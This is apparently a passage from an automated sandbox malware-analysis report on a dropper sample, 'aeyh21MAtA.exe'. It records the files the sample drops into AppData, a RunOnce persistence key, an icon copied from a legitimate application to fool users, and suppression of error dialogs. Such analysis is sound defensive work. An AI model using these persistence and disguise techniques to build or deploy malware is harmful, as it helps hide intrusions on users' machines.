                          Source: C:\Windows\SysWOW64\xcopy.exeFile written: C:\Users\user\AppData\Roaming\template\config.iniJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\is-MK5MR.tmp\aeyh21MAtA.tmpKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOwnerJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\is-PD76Q.tmp\aeyh21MAtA.tmpWindow found: window name: TMainFormJump to behavior
                          Source: Window RecorderWindow detected: More than 3 window changes detected
                          Source: aeyh21MAtA.exeStatic file information: File size 7234714 > 1048576
                          Source: Binary string: vcruntime140.i386.pdb source: aeyh21MAtA.tmp, 00000004.00000003.2441306284.000000000710A000.00000004.00001000.00020000.00000000.sdmp, xcopy.exe, 00000008.00000003.2710833061.0000000003089000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000002.3384892485.000000006CC81000.00000020.00000001.01000000.00000014.sdmp
                          Source: Binary string: vcruntime140.i386.pdbGCTL source: aeyh21MAtA.tmp, 00000004.00000003.2441306284.000000000710A000.00000004.00001000.00020000.00000000.sdmp, xcopy.exe, 00000008.00000003.2710833061.0000000003089000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000002.3384892485.000000006CC81000.00000020.00000001.01000000.00000014.sdmp
                          Source: Binary string: D:\ProjectsVS2015\OpenSSL\openssl-1.1.1l\libcrypto-1_1.pdb source: xcopy.exe, 00000008.00000003.2447777452.000000000325D000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000002.3372819038.000000006BE10000.00000002.00000001.01000000.00000013.sdmp, is-E6DJ2.tmp.4.dr
                          Source: Binary string: D:\ProjectsVS2015\!Ast_SVN\00_Bin\libjpeg-turbo-win.pdb! source: xcopy.exe, 00000008.00000003.2453881956.00000000030AD000.00000004.00000020.00020000.00000000.sdmp
                          Source: Binary string: vcomp140.i386.pdbGCTL source: aeyh21MAtA.tmp, 00000004.00000003.2441306284.000000000710A000.00000004.00001000.00020000.00000000.sdmp, xcopy.exe, 00000008.00000003.2710762218.0000000003089000.00000004.00000020.00020000.00000000.sdmp
                          Source: Binary string: msvcr120.i386.pdb source: xcopy.exe, 00000008.00000003.2454654792.0000000003089000.00000004.00000020.00020000.00000000.sdmp
                          Source: Binary string: D:\CFILES\Projects\WinSSL\openssl-1.1.0g\libcrypto-1_1.pdb source: xcopy.exe, 00000008.00000003.2449507358.0000000003272000.00000004.00000020.00020000.00000000.sdmp
                          Source: Binary string: D:\ProjectsVS2015\!Ast_SVN\00_Bin\AstClient.pdbe source: ast.exe, 0000000A.00000002.3386730194.000000006CEF3000.00000002.00000001.01000000.0000000E.sdmp
                          Source: Binary string: C:\OpenSSL\Temp\openssl-1.0.2u-x32\out32dll\ssleay32.pdb source: aeyh21MAtA.tmp, 00000004.00000003.2441306284.000000000710A000.00000004.00001000.00020000.00000000.sdmp, xcopy.exe, 00000008.00000003.2710683559.0000000003089000.00000004.00000020.00020000.00000000.sdmp
                          Source: Binary string: C:\OpenSSL\Temp\openssl-1.0.2u-x32\out32dll\ssleay32.pdb@W source: aeyh21MAtA.tmp, 00000004.00000003.2441306284.000000000710A000.00000004.00001000.00020000.00000000.sdmp, xcopy.exe, 00000008.00000003.2710683559.0000000003089000.00000004.00000020.00020000.00000000.sdmp
                          Source: Binary string: D:\ProjectsVS2015\!Ast_SVN\00_Bin\AstRct.pdb source: xcopy.exe, 00000008.00000003.2446543838.0000000003089000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000002.3377655988.000000006C1AF000.00000002.00000001.01000000.00000010.sdmp, is-SNDPS.tmp.4.dr
                          Source: Binary string: D:\Projects\Delphi\_Assistant\10_FSTEK_02\00_Bin\Hatls.pdb source: xcopy.exe, 00000008.00000003.2446944142.0000000003273000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000002.3383625621.000000006C462000.00000002.00000001.01000000.0000000F.sdmp
                          Source: Binary string: D:\ProjectsVS2015\!Ast_SVN\00_Bin\libjpeg-turbo-win.pdb source: xcopy.exe, 00000008.00000003.2453881956.00000000030AD000.00000004.00000020.00020000.00000000.sdmp
                          Source: Binary string: D:\ProjectsVS2015\OpenSSL\openssl-1.1.1l\libssl-1_1.pdb@@ source: xcopy.exe, 00000008.00000003.2454146070.00000000030A9000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000002.3368070607.000000006BBB1000.00000002.00000001.01000000.00000012.sdmp
                          Source: Binary string: vcomp140.i386.pdb source: aeyh21MAtA.tmp, 00000004.00000003.2441306284.000000000710A000.00000004.00001000.00020000.00000000.sdmp, xcopy.exe, 00000008.00000003.2710762218.0000000003089000.00000004.00000020.00020000.00000000.sdmp
                          Source: Binary string: D:\Projects\Delphi\_Assistant\10_FSTEK_02\00_Bin\Hatls.pdbf source: xcopy.exe, 00000008.00000003.2446944142.0000000003273000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000002.3383625621.000000006C462000.00000002.00000001.01000000.0000000F.sdmp
                          Source: Binary string: D:\ProjectsVS2015\OpenSSL\openssl-1.1.1l\libssl-1_1.pdb source: xcopy.exe, 00000008.00000003.2454146070.00000000030A9000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000002.3368070607.000000006BBB1000.00000002.00000001.01000000.00000012.sdmp
                          Source: Binary string: compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -DOPENSSL_CPUID_OBJ -DOPENSSL_BN_ASM_PART_WORDS -DOPENSSL_IA32_SSE2 -DOPENSSL_BN_ASM_MONT -DOPENSSL_BN_ASM_GF2m -DSHA1_ASM -DSHA256_ASM -DSHA512_ASM -DRC4_ASM -DMD5_ASM -DRMD160_ASM -DAESNI_ASM -DVPAES_ASM -DWHIRLPOOL_ASM -DGHASH_ASM -DECP_NISTZ256_ASM -DPOLY1305_ASM source: ast.exe, 0000000A.00000002.3372819038.000000006BDA7000.00000002.00000001.01000000.00000013.sdmp, is-E6DJ2.tmp.4.dr
                          Source: Binary string: D:\ProjectsVS2015\!Ast_SVN\00_Bin\AstClient.pdb source: ast.exe, 0000000A.00000002.3386730194.000000006CEF3000.00000002.00000001.01000000.0000000E.sdmp
                          Source: Binary string: D:\ProjectsVS2015\!Ast_SVN\00_Bin\AstRct.pdbM6 source: xcopy.exe, 00000008.00000003.2446543838.0000000003089000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000002.3377655988.000000006C1AF000.00000002.00000001.01000000.00000010.sdmp, is-SNDPS.tmp.4.dr
                          Source: Binary string: @ compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -DOPENSSL_CPUID_OBJ -DOPENSSL_BN_ASM_PART_WORDS -DOPENSSL_IA32_SSE2 -DOPENSSL_BN_ASM_MONT -DOPENSSL_BN_ASM_GF2m -DSHA1_ASM -DSHA256_ASM -DSHA512_ASM -DRC4_ASM -DMD5_ASM -DRMD160_ASM -DAESNI_ASM -DVPAES_ASM -DWHIRLPOOL_ASM -DGHASH_ASM -DECP_NISTZ256_ASM -DPOLY1305_ASMOpenSSL 1.1.1l 24 Aug 2021built on: Tue Sep 7 07:24:19 2021 UTCplatform: VC-WIN32OPENSSLDIR: "C:\Program Files (x86)\Common Files\SSL"ENGINESDIR: "C:\Program Files (x86)\OpenSSL\lib\engines-1_1"not availabledes(long) source: ast.exe, 0000000A.00000002.3372819038.000000006BDA7000.00000002.00000001.01000000.00000013.sdmp, is-E6DJ2.tmp.4.dr
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeCode function: 10_2_6B7AAE50 WSAStartup,WSACleanup,GetModuleHandleA,GetProcAddress,_strpbrk,LoadLibraryA,GetProcAddress,GetSystemDirectoryA,GetSystemDirectoryA,LoadLibraryA,GetProcAddress,if_nametoindex,QueryPerformanceFrequency,10_2_6B7AAE50
                          Source: is-SNDPS.tmp.4.drStatic PE information: section name: .rodata
                          Source: is-S3CIC.tmp.4.drStatic PE information: section name: .textbss
                          Source: is-S3CIC.tmp.4.drStatic PE information: section name: .msvcjmc
                          Source: is-S3CIC.tmp.4.drStatic PE information: section name: .00cfg
                          Source: is-E6DJ2.tmp.4.drStatic PE information: section name: .00cfg
                          Source: is-GPS00.tmp.4.drStatic PE information: section name: .00cfg
                          Source: is-JCRD8.tmp.4.drStatic PE information: section name: .code
                          Source: libssl-1_1.dll.8.drStatic PE information: section name: .00cfg
                          Source: quartz.dll.8.drStatic PE information: section name: .code
                          Source: astrct.dll.8.drStatic PE information: section name: .rodata
                          Source: hatls.dll.8.drStatic PE information: section name: .textbss
                          Source: hatls.dll.8.drStatic PE information: section name: .msvcjmc
                          Source: hatls.dll.8.drStatic PE information: section name: .00cfg
                          Source: libcrypto-1_1.dll.8.drStatic PE information: section name: .00cfg
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeCode function: 10_2_6B7D9F78 push ecx; ret 10_2_6B7D9F76
                          Source: is-MU1HO.tmp.4.drStatic PE information: section name: .text entropy: 6.95576372950548
                          Source: msvcr120.dll.8.drStatic PE information: section name: .text entropy: 6.95576372950548
                          Source: C:\Users\user\AppData\Local\Temp\is-PD76Q.tmp\aeyh21MAtA.tmpFile created: C:\Users\user\AppData\Local\Temp\is-3UH24.tmp\_isetup\_shfoldr.dllJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\is-PD76Q.tmp\aeyh21MAtA.tmpFile created: C:\Users\user\AppData\Local\Temp\u7i3kw\libeay32.dll (copy)Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\is-PD76Q.tmp\aeyh21MAtA.tmpFile created: C:\Users\user\AppData\Local\Temp\is-3UH24.tmp\_isetup\_setup64.tmpJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\is-PD76Q.tmp\aeyh21MAtA.tmpFile created: C:\Users\user\AppData\Local\Temp\u7i3kw\is-S3CIC.tmpJump to dropped file
                          Source: C:\Windows\SysWOW64\xcopy.exeFile created: C:\Users\user\AppData\Roaming\template\libcrypto-1_1.dllJump to dropped file
                          Source: C:\Windows\SysWOW64\xcopy.exeFile created: C:\Users\user\AppData\Roaming\template\astclient.dllJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\is-PD76Q.tmp\aeyh21MAtA.tmpFile created: C:\Users\user\AppData\Local\Temp\u7i3kw\is-BG0DN.tmpJump to dropped file
                          Source: C:\Windows\SysWOW64\xcopy.exeFile created: C:\Users\user\AppData\Roaming\template\ast.exeJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\is-PD76Q.tmp\aeyh21MAtA.tmpFile created: C:\Users\user\AppData\Local\Temp\u7i3kw\is-JCRD8.tmpJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\is-PD76Q.tmp\aeyh21MAtA.tmpFile created: C:\Users\user\AppData\Local\Temp\u7i3kw\opus.dll (copy)Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\is-PD76Q.tmp\aeyh21MAtA.tmpFile created: C:\Users\user\AppData\Local\Temp\u7i3kw\quartz.dll (copy)Jump to dropped file
                          Source: C:\Windows\SysWOW64\xcopy.exeFile created: C:\Users\user\AppData\Roaming\template\opus.dllJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\is-PD76Q.tmp\aeyh21MAtA.tmpFile created: C:\Users\user\AppData\Local\Temp\u7i3kw\libcrypto-1_1.dll (copy)Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\is-PD76Q.tmp\aeyh21MAtA.tmpFile created: C:\Users\user\AppData\Local\Temp\u7i3kw\msvcr120.dll (copy)Jump to dropped file
                          Source: C:\Windows\SysWOW64\xcopy.exeFile created: C:\Users\user\AppData\Roaming\template\astrct.dllJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\is-PD76Q.tmp\aeyh21MAtA.tmpFile created: C:\Users\user\AppData\Local\Temp\u7i3kw\astclient.dll (copy)Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\is-PD76Q.tmp\aeyh21MAtA.tmpFile created: C:\Users\user\AppData\Local\Temp\u7i3kw\hatls.dll (copy)Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\is-PD76Q.tmp\aeyh21MAtA.tmpFile created: C:\Users\user\AppData\Local\Temp\u7i3kw\is-60GLH.tmpJump to dropped file
                          Source: C:\Windows\SysWOW64\xcopy.exeFile created: C:\Users\user\AppData\Roaming\template\msvcr120.dllJump to dropped file
                          Source: C:\Windows\SysWOW64\xcopy.exeFile created: C:\Users\user\AppData\Roaming\template\AstCrp.dllJump to dropped file
                          Source: C:\Windows\SysWOW64\xcopy.exeFile created: C:\Users\user\AppData\Roaming\template\aw_sas32.dllJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\is-PD76Q.tmp\aeyh21MAtA.tmpFile created: C:\Users\user\AppData\Local\Temp\u7i3kw\is-AAPRN.tmpJump to dropped file
                          Source: C:\Windows\SysWOW64\xcopy.exeFile created: C:\Users\user\AppData\Roaming\template\libcurl.dllJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\is-PD76Q.tmp\aeyh21MAtA.tmpFile created: C:\Users\user\AppData\Local\Temp\u7i3kw\aw_sas32.dll (copy)Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\is-MK5MR.tmp\aeyh21MAtA.tmpFile created: C:\Users\user\AppData\Local\Temp\is-KMJLJ.tmp\_isetup\_iscrypt.dllJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\is-MK5MR.tmp\aeyh21MAtA.tmpFile created: C:\Users\user\AppData\Local\Temp\is-KMJLJ.tmp\_isetup\_shfoldr.dllJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\is-PD76Q.tmp\aeyh21MAtA.tmpFile created: C:\Users\user\AppData\Local\Temp\u7i3kw\ast.exe (copy)Jump to dropped file
                          Source: C:\Users\user\Desktop\aeyh21MAtA.exeFile created: C:\Users\user\AppData\Local\Temp\is-MK5MR.tmp\aeyh21MAtA.tmpJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\is-PD76Q.tmp\aeyh21MAtA.tmpFile created: C:\Users\user\AppData\Local\Temp\u7i3kw\libjpeg-turbo-win.dll (copy)Jump to dropped file
                          Source: C:\Windows\SysWOW64\xcopy.exeFile created: C:\Users\user\AppData\Roaming\template\libeay32.dllJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\is-PD76Q.tmp\aeyh21MAtA.tmpFile created: C:\Users\user\AppData\Local\Temp\u7i3kw\astrct.dll (copy)Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\is-PD76Q.tmp\aeyh21MAtA.tmpFile created: C:\Users\user\AppData\Local\Temp\u7i3kw\is-SNDPS.tmpJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\is-PD76Q.tmp\aeyh21MAtA.tmpFile created: C:\Users\user\AppData\Local\Temp\u7i3kw\is-GPS00.tmpJump to dropped file
                          Source: C:\Windows\SysWOW64\xcopy.exeFile created: C:\Users\user\AppData\Roaming\template\libcryptoMD.dllJump to dropped file
                          Source: C:\Users\user\Desktop\aeyh21MAtA.exeFile created: C:\Users\user\AppData\Local\Temp\is-PD76Q.tmp\aeyh21MAtA.tmpJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\is-PD76Q.tmp\aeyh21MAtA.tmpFile created: C:\Users\user\AppData\Local\Temp\u7i3kw\is-5765H.tmpJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\is-PD76Q.tmp\aeyh21MAtA.tmpFile created: C:\Users\user\AppData\Local\Temp\u7i3kw\is-16KCC.tmpJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\is-PD76Q.tmp\aeyh21MAtA.tmpFile created: C:\Users\user\AppData\Local\Temp\is-3UH24.tmp\_isetup\_iscrypt.dllJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\is-PD76Q.tmp\aeyh21MAtA.tmpFile created: C:\Users\user\AppData\Local\Temp\u7i3kw\is-5FFPK.tmpJump to dropped file
                          Source: C:\Windows\SysWOW64\xcopy.exeFile created: C:\Users\user\AppData\Roaming\template\libssl-1_1.dllJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\is-PD76Q.tmp\aeyh21MAtA.tmpFile created: C:\Users\user\AppData\Local\Temp\u7i3kw\libcurl.dll (copy)Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\is-PD76Q.tmp\aeyh21MAtA.tmpFile created: C:\Users\user\AppData\Local\Temp\u7i3kw\libssl-1_1.dll (copy)Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\is-MK5MR.tmp\aeyh21MAtA.tmpFile created: C:\Users\user\AppData\Local\Temp\is-KMJLJ.tmp\_isetup\_setup64.tmpJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\is-PD76Q.tmp\aeyh21MAtA.tmpFile created: C:\Users\user\AppData\Local\Temp\u7i3kw\AstCrp.dll (copy)Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\is-PD76Q.tmp\aeyh21MAtA.tmpFile created: C:\Users\user\AppData\Local\Temp\u7i3kw\is-MU1HO.tmpJump to dropped file
                          Source: C:\Windows\SysWOW64\xcopy.exeFile created: C:\Users\user\AppData\Roaming\template\quartz.dllJump to dropped file
                          Source: C:\Windows\SysWOW64\xcopy.exeFile created: C:\Users\user\AppData\Roaming\template\libjpeg-turbo-win.dllJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\is-PD76Q.tmp\aeyh21MAtA.tmpFile created: C:\Users\user\AppData\Local\Temp\u7i3kw\is-TBGHD.tmpJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\is-PD76Q.tmp\aeyh21MAtA.tmpFile created: C:\Users\user\AppData\Local\Temp\u7i3kw\libcryptoMD.dll (copy)Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\is-PD76Q.tmp\aeyh21MAtA.tmpFile created: C:\Users\user\AppData\Local\Temp\u7i3kw\is-VO31B.tmpJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\is-PD76Q.tmp\aeyh21MAtA.tmpFile created: C:\Users\user\AppData\Local\Temp\u7i3kw\is-0HK0N.tmpJump to dropped file
                          Source: C:\Windows\SysWOW64\xcopy.exeFile created: C:\Users\user\AppData\Roaming\template\hatls.dllJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\is-PD76Q.tmp\aeyh21MAtA.tmpFile created: C:\Users\user\AppData\Local\Temp\u7i3kw\is-E6DJ2.tmpJump to dropped file
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce astJump to behavior
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce astJump to behavior
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce astJump to behavior
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce astJump to behavior

                          Hooking and other Techniques for Hiding and Protection

                          barindex
                          Icon mismatch, binary includes an icon from a different legit application in order to fool users
                          Source: initial sampleIcon embedded in binary file: icon matches a legit application icon: icon (15).png
                          Source: C:\Users\user\Desktop\aeyh21MAtA.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\is-MK5MR.tmp\aeyh21MAtA.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\is-MK5MR.tmp\aeyh21MAtA.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\is-MK5MR.tmp\aeyh21MAtA.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\is-MK5MR.tmp\aeyh21MAtA.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\is-MK5MR.tmp\aeyh21MAtA.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\is-MK5MR.tmp\aeyh21MAtA.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\is-MK5MR.tmp\aeyh21MAtA.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\is-MK5MR.tmp\aeyh21MAtA.tmpProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\aeyh21MAtA.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\is-PD76Q.tmp\aeyh21MAtA.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\is-PD76Q.tmp\aeyh21MAtA.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\is-PD76Q.tmp\aeyh21MAtA.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\is-PD76Q.tmp\aeyh21MAtA.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\is-PD76Q.tmp\aeyh21MAtA.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\is-PD76Q.tmp\aeyh21MAtA.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\is-PD76Q.tmp\aeyh21MAtA.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\is-PD76Q.tmp\aeyh21MAtA.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\is-PD76Q.tmp\aeyh21MAtA.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
